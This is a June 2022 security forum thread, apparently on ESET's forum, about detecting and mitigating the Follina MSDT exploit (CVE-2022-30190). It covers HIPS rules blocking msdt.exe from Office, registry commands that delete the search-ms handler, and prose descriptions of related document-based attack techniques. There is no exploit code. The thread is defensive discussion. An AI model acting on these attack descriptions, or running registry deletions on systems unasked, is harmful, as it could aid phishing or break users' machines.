jinlei801011 2 Posted June 1, 2022 Share Posted June 1, 2022 Recently CVE-2022-30190 was disclosed by Microsoft (https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/) and is detected by Microsoft Defender. Whether my customers' ESET Endpoint is going to detect this? I cannot find any info to it. Link to comment Share on other sites More sharing options...
Camilo Diaz 2 Posted June 1, 2022 Share Posted June 1, 2022 Link to comment Share on other sites More sharing options...
TStowy65 0 Posted June 1, 2022 Share Posted June 1, 2022 I just chatted ESET support and got the agent's permissions to add this. Date: 2022-06-01 12:32:55 PDT To: Everyone From: Wyatt P. Can confirm we detect it as Win32/Exploit.CVE-2022-30190 trojan. ---------------------------------------------------------- Date: 2022-06-01 12:33:21 PDT To: Everyone From: Wyatt P. These are the Microsoft recommendations https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/ ---------------------------------------------------------- Date: 2022-06-01 12:33:28 PDT To: Everyone From: Wyatt P. No patch from MS available at this moment Link to comment Share on other sites More sharing options...
itman 1,748 Posted June 1, 2022 Share Posted June 1, 2022 13 minutes ago, TStowy65 said: These are the Microsoft recommendations https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/ That is not enough to fully mitigate this vulnerability. See my posting here: https://forum.eset.com/topic/32571-ms-word-follina-exploit-not-detected/?do=findComment&comment=151719 Link to comment Share on other sites More sharing options...
itman 1,748 Posted June 1, 2022 Share Posted June 1, 2022 (edited) I will note that for anyone using Eset recommended anti-ransomware HIPS rules, this attack can be mitigated by adding C:\Windows\System32\msdt.exe -EDIT- and C:\Windows\SysWOW64\msdt.exe to the list of specific startup applications for the rule named "Deny child processes from Office 20xx processes." Ref.: https://www.huntress.com/blog/microsoft-office-remote-code-execution-follina-msdt-bug Edited June 2, 2022 by itman Trooper 1 Link to comment Share on other sites More sharing options...
czesetfan 29 Posted June 2, 2022 Share Posted June 2, 2022 4 hours ago, itman said: I will note that for anyone using Eset recommended anti-ransomware HIPS rules, this attack can be mitigated by adding C:\Windows\System32\msdt.exe to the list of specific startup applications for the rule named "Deny child processes from Office 20xx processes." Ref.: https://www.huntress.com/blog/microsoft-office-remote-code-execution-follina-msdt-bug And it also applies to: C:\Windows\SysWOW64\msdt.exe ? Link to comment Share on other sites More sharing options...
schuetzdentalCB 8 Posted June 2, 2022 Share Posted June 2, 2022 Quote And it also applies to: C:\Windows\SysWOW64\msdt.exe ? if you type in both path's of msdt of course^^ Link to comment Share on other sites More sharing options...
itman 1,748 Posted June 2, 2022 Share Posted June 2, 2022 (edited) 8 hours ago, czesetfan said: And it also applies to: C:\Windows\SysWOW64\msdt.exe ? If you are running a 32 bit version of MS Office, then the answer is yes. Also possibly if you are running a 32 bit version of Windows. Adding both System32 and SysWOW64 versions might be a good idea. Edited June 2, 2022 by itman Link to comment Share on other sites More sharing options...
itman 1,748 Posted June 2, 2022 Share Posted June 2, 2022 (edited) BTW - this ms-msdt use isn't the only exploit that currently exists in MS Office: Quote This was seen yesterday when Hickey converted existing Microsoft Word MSDT exploits to use the search-ms protocol handler we described earlier. With this new PoC, when a user opens a Word document, it will automatically launch a 'search-ms' command to open a Windows Search window that lists executables on a remote SMB share. This share can be named whatever the threat actor wants, such as 'Critical Updates,' prompting the users to install the listed malware. Microsoft Office search-ms: URI handler exploitation, requires user-interaction. Unpatched. pic.twitter.com/iYbZNtMpnx — hackerfantastic.crypto (@hackerfantastic) June 1, 2022 Like the MSDT exploits, Hickey also showed that you could create RTF versions that automatically open a Windows Search window when the document is rendered in the Explorer preview pane. Here is the same search-ms attack being leveraged through an RTF document when Windows Preview Pane is enabled... 😉 pic.twitter.com/AmOeGWltjm — hackerfantastic.crypto (@hackerfantastic) June 1, 2022 By using this type of malicious Word document, threat actors can create elaborate phishing campaigns that automatically launch Windows Search windows on recipients' devices to trick them into launching malware. While this exploit is not as severe as the MS-MSDT remote code execution vulnerability, it could lead to abuse by industrious threat actors who want to create sophisticated phishing campaigns. Although we've already found ways threat actors could exploit this new flaw in the wild, we're not going to share this information for obvious reasons. To mitigate this vulnerability, Hickey says you can use the same mitigation for ms-msdt exploits - delete the search-ms protocol handler from the Windows Registry. Run Command Prompt as Administrator. To back up the registry key, execute the command "reg export HKEY_CLASSES_ROOT\search-ms search-ms.reg" Execute the command "reg delete HKEY_CLASSES_ROOT\search-ms /f" https://www.bleepingcomputer.com/news/security/new-windows-search-zero-day-added-to-microsoft-protocol-nightmare/ This leads me to believe that it might be advisable to take the Microsoft Defender ASLR rule approach in regards to MS Office executable's and block all child process startup from them. Of course, this might bork something legit. Edited June 2, 2022 by itman Trooper 1 Link to comment Share on other sites More sharing options...
ESET Insiders Trooper 67 Posted June 8, 2022 ESET Insiders Share Posted June 8, 2022 On 6/1/2022 at 7:19 PM, itman said: I will note that for anyone using Eset recommended anti-ransomware HIPS rules, this attack can be mitigated by adding C:\Windows\System32\msdt.exe -EDIT- and C:\Windows\SysWOW64\msdt.exe to the list of specific startup applications for the rule named "Deny child processes from Office 20xx processes." Ref.: https://www.huntress.com/blog/microsoft-office-remote-code-execution-follina-msdt-bug Thanks for this @itmanis there anything else that I can do with ESET to block this? I have done the MS registry key already at work. Cheers. Link to comment Share on other sites More sharing options...
itman 1,748 Posted June 8, 2022 Share Posted June 8, 2022 (edited) 13 hours ago, Trooper said: Thanks for this @itmanis there anything else that I can do with ESET to block this? I have done the MS registry key already at work. Based on my testing of recent Follina malware samples, Eset has you covered in regards to this specific msdt.exe exploit. All samples were detected upon download; either by signature detection of payload or via Eset exploit protection by CVE. However, there's another exploit technique that has been discovered that I posted about over at wilderssecurity.com and described here: https://www.bleepingcomputer.com/news/security/new-dogwalk-windows-zero-day-bug-gets-free-unofficial-patches/ . This one appears to be a Microsoft Defender bypass since opening of the malware dropper, a .cab file, bypassed Mark-of-the-Web checking. Until shown otherwise, I would say Eset should cover this one also. -EDIT- Looks like Eset has issues with Qbot malware deployment of Follina exploit: https://forum.eset.com/topic/32642-eset-not-detecting-qbot-deploying-follina-exploit/ Edited June 8, 2022 by itman Trooper 1 Link to comment Share on other sites More sharing options...
ESET Insiders Trooper 67 Posted June 8, 2022 ESET Insiders Share Posted June 8, 2022 6 hours ago, itman said: Based on my testing of recent Follina malware samples, Eset has you covered in regards to this specific msdt.exe exploit. All samples were detected upon download; either by signature detection of payload or via Eset exploit protection by CVE. However, there's another exploit technique that has been discovered that I posted about over at wilderssecurity.com and described here: https://www.bleepingcomputer.com/news/security/new-dogwalk-windows-zero-day-bug-gets-free-unofficial-patches/ . This one appears to be a Microsoft Defender bypass since opening of the malware dropper, a .cab file, bypassed Mark-of-the-Web checking. Until shown otherwise, I would say Eset should cover this one also. -EDIT- Looks like Eset has issues with Qbot malware deployment of Follina exploit: https://forum.eset.com/topic/32642-eset-not-detecting-qbot-deploying-follina-exploit/ Thank you for your reply. Looks like ESET has now addressed the Qbot malware deployment as well. Cheers. Link to comment Share on other sites More sharing options...
Recommended Posts